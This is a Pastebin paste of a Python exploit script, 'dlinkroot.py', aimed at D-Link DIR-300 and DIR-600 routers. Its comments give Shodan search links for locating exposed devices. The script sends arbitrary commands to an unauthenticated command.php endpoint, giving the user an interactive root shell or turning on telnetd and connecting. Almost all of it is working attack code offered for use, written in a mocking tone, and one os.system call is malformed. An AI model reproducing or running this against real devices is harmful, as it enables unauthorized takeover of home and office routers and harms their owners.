infodox

dlinkroot.py

Feb 7th, 2013
1,569
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # D-LINK TOTAL FAIL
  3. # Adv: http://www.s3cur1ty.de/m1adv2013-003
  4. # SHODANS BELOW
  5. # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
  6. # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
  7. # Who knew a shell could be so easy?
  8. # @info_dox - insecurety.net
  9. import sys
  10. import os
  11. import requests
  12.  
  13. if len(sys.argv) != 3:
  14. print "Usage: ./dlinkroot.py <target> <mode>"
  15. print "Modes: shell or telnetenable"
  16. print "I was lazy so I assume you have a telnet client"
  17. sys.exit(0)
  18.  
  19. target = sys.argv[1]
  20. mode = sys.argv[2]
  21.  
  22. def shell(target):
  23. print "[+] Connecting and spawning a shell..."
  24. while True:
  25. try:
  26. bobcat = raw_input("%s:~# " %(target))
  27. lulz = "cmd=%s;" %(bobcat)
  28. url = "http://" + target + "/command.php"
  29. hax = requests.post(url, lulz)
  30. print hax.text
  31. except KeyboardInterrupt:
  32. print "\n[-] Quitting"
  33. sys.exit(1)
  34.  
  35. def telnetenable(target):
  36. lulz = "cmd=telnetd;"
  37. url = "http://" + target + "/command.php"
  38. print "[+] Trying to enable telnet"
  39. try:
  40. hax = requests.post(url, lulz)
  41. print hax.text
  42. except Exception:
  43. print "[-] IT FAILED IT!"
  44. sys.exit(0)
  45. print "[+] Doing a telnet"
  46. try:
  47. os.system('telnet %s') %(target)
  48. except Exception:
  49. print "[-] IT FAILED IT!"
  50. sys.exit(1)
  51.  
  52. if mode == "shell":
  53. shell(target)
  54. elif mode == "telnetenable":
  55. telnetenable(target)
  56. else:
  57. print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"
RAW Paste Data